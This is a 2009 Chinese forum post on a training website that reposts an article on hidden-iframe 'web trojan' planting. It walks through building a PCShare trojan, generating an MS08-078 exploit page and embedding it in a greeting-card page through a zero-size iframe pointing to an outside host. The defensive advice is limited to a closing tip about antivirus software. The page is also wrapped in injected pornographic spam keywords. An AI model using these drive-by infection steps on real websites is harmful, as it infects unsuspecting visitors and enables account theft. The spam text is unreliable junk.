www.idcii.cn-欧美人禽杂交狂配视频,亚洲综合亚洲综合网成人,飘雪在线影院观看免费完整版高清,一级做a爰片久久成人毛片免费毛片

      企業(yè)培訓
      首頁 地區(qū)推薦 清華EDP 企業(yè)內(nèi)訓 公開課 職業(yè)培訓 HR資訊 培訓需求 培訓公司 培訓顧問 客戶服務 在線論壇
      當前類別 > 在線論壇
           
      巔峰培訓論壇 > 先進管理經(jīng)驗[管理培訓資源] >
      你必須先進行登錄 才能發(fā)貼,注冊新會員請點這里.
      今日貼數(shù):7712 |主題總數(shù):77112 | 帖子總數(shù):79955 | 會員總數(shù):2538

      最新貼子 |  熱門貼子 |  搜索貼子 
        本版搜索:  
      清華大學總裁班目錄 │││ 北京大學總裁班目錄 │││ 中國能源電力企業(yè)家班 │││ 國家職業(yè)資格考證
      人力 營銷 財務 生產(chǎn) 職業(yè)經(jīng)理 投融資 收藏品藝術品投資鑒賞 能源班 特色小鎮(zhèn)班 PPP實戰(zhàn) 經(jīng)營方略CEO班 私募投資(PE) 清華教授、能源局領導、知名企業(yè)家,培養(yǎng)全球化視野及國際競爭力的創(chuàng)新型能源企業(yè)領導者 人力資源師國際財務師安全評價師信用管理師對外漢語教師
          您是本貼的第 15384 個閱讀者  
        主題:了解IFRAME框架掛馬\相應的防范解決方法 2009/7/15 20:18:42  
         zgzx1
         等級:論壇騎士(三級)
         積分:2372分
         注冊:2009-5-20
         發(fā)表:709(415主題貼)
         登錄:1098
      1 
      了解IFRAME框架掛馬\相應的防范解決方法
           了解IFRAME框架掛馬\相應的防范解決方法
          
           注:最近自己網(wǎng)站被iframe框架掛馬在找解決辦法,找的這樣一篇文章:
          
           當前網(wǎng)絡安全最大的危險是什么?很多人都會說是網(wǎng)頁掛馬。沒錯!為了大規(guī)模盜號,掛馬的網(wǎng)頁在去年數(shù)以千萬計的增長。普通網(wǎng)民知道怎么在電腦中防范網(wǎng)頁掛馬就可以了,從事和想從事與網(wǎng)絡安全相關工作的朋友就要多掌握一些知識,知道網(wǎng)頁掛馬到底是怎么進行的,有哪幾種方式。知己知彼,就會更好地維護網(wǎng)吧、網(wǎng)站等,就會增加自己的安全技能,逐漸成長為一名安全工程師。
             一名優(yōu)秀的安全工程師,要能獨立負責網(wǎng)站安全、局域網(wǎng)安全、服務器安全等,要了解網(wǎng)頁掛馬有IFRAME框架掛馬、JS文件掛馬、偽裝掛馬、CSS掛馬、ActiveX組件掛馬等方式,這樣才可以有針對性地進行防范,避免網(wǎng)站和服務器等安全威脅。下面,我們來邁出成長為安全工程師的第一步,掌握IFRAME框架掛馬的底細以及相應的防范方法。
          
             什么是IFRAME框架掛馬
          
             網(wǎng)頁掛馬到如今已經(jīng)發(fā)展出許多方法與應用手段,其中IFRAME網(wǎng)頁框架掛馬是最典型的掛馬方式,也是最基本的掛馬方式,可以說沒有IFRAME,網(wǎng)頁木馬中有一多半就無法很好地隱藏,讓用戶在不察覺中受到攻擊。
          
             什么是IFRAME?IFRAME是一個非常普通的HTML語言標記,它主要用來在一個網(wǎng)頁界面中,劃分出左右或者上下的框架,就如同我們電視機的畫中畫效果一樣。圖2中的山寨搜索引擎的界面就是典型的IFRAME的引用。
          
             但是IFRAME功能也被黑客巧妙地利用了,黑客在一些看似正常的網(wǎng)頁中,使用長寬為0的隱藏框架,讓用戶在不知不覺中打開含有漏洞溢出內(nèi)容的網(wǎng)頁木馬,這種手法就如同在畫中畫電視中打開了一個收費頻道,但是由于收費頻道的畫面尺寸被惡意修改成了0,所以看電視的人并不知道自己已經(jīng)打開了收費頻道,雖然他并沒有看到,但是事實上收費頻道卻的確在播放,而且會收取用戶的使用費。
          
             IFRAME框架掛馬實戰(zhàn)
          
             下面我們來做個演示,看看IFRAME框架掛馬到底是怎么做的。
          
             第一步:準備一款得心應手的木馬,例如PCShare,這款軟件在設置上非常簡單,易于操作上手。設置好相關服務,最后生成木馬所用的服務控制端。
          
             第二步:使用FTP將木馬上傳到自己的網(wǎng)站空間中,并用記事本記錄下木馬的網(wǎng)絡路徑。然后再用《MS08-078網(wǎng)頁木馬生成器》,生成一個帶有MS08-078漏洞的惡意網(wǎng)頁。找一個正常的新年賀卡網(wǎng)頁,將該網(wǎng)頁保存到自己指定的目錄中,然后使用Web Designer或Dreamweaver網(wǎng)頁編輯軟件對保存的網(wǎng)頁進行調(diào)整修改,然后上傳到自己的網(wǎng)站空間中,看圖片等內(nèi)容是否能夠正常顯示。
          
             第三步:再一次打開修改好的賀卡網(wǎng)頁,使用IFRAME標記語句,將生成好的MS08-078網(wǎng)頁嵌入到賀卡網(wǎng)頁中,嵌入掛馬代碼如下:
           <iframe src=http://www.hrweek.cn/ms08078.html width=0 height=0></iframe>
          
             將這段代碼插入到賀卡網(wǎng)頁之中后,就完成了我們的網(wǎng)頁掛馬操作。瀏覽賀卡網(wǎng)頁的用戶,在看到賀卡頁面之后,也隨之運行了保存在指定位置“http://www.hrweek.cn/ms08078.html”的漏洞溢出頁面,但是由于它的長和寬都為“0”,觀看賀卡網(wǎng)站的用戶不會看到溢出頁面。
          
             提示:對于IFRAME標記這種利用正常HTML語言功能實現(xiàn)隱藏的掛馬方式,目前并沒有好的防范方法,因為它是正常的網(wǎng)頁功能。大家只能夠寄希望于殺毒軟件和防掛馬軟件阻止利用IFRAME標記內(nèi)嵌的溢出病毒網(wǎng)頁。我們建議在安裝殺毒軟件之后,能夠安裝第三方防掛馬軟件作為補充,例如銳甲、360等。
          
      2009/7/15 20:18:42
      編輯該貼   回復該貼 | 查看 
      1/0 頁 每頁 10 貼 本主題貼數(shù) 0   分頁: 轉(zhuǎn)到
      管理選項:  刪除  | 總置頂  | 置頂  | 精華  | 普通  | 轉(zhuǎn)移該貼到:
       
      快速回復(必須登陸成功才能發(fā)表)
       用戶名:  密碼:
       主  題:* 不能超過50個漢字或者100個字符
      粗體 斜體 下劃線 居中 空格 超級鏈接 插入圖片 插入Flash 飛行的文字 移動的文字
       

       
        
       
      清華大學高級研修班   清華總裁班 能源產(chǎn)業(yè)500強項目庫  能源產(chǎn)業(yè)總裁班  中央財經(jīng)大學私募班  能源500強企業(yè)生態(tài)   核技術聯(lián)盟
        有新帖   沒新帖   總置頂   置頂   精華貼   熱貼   普通貼
      本站網(wǎng)絡實名:“顛峰培訓網(wǎng)”“顛峰人力資源網(wǎng)”
      Copyright 2004 All rights reserved     版權所有:巔峰培訓
      地址:海淀區(qū)中關村東路95號中國科學院自動化東樓  電話:(010)8243115O
      国产偷窥熟女精品视频大全| 丁香花在线电影小说| gogogo免费观看国语| 国产精品亚洲欧美日韩精品白浆高清| 大地影院高清MV在线观看| 国产精品欧美日韩一区二区| 国产精品无码av在线播放| HD2中国成熟IPHONE69| 真实国产乱子伦对白视频37p| 星空无限传媒免费观看电视剧|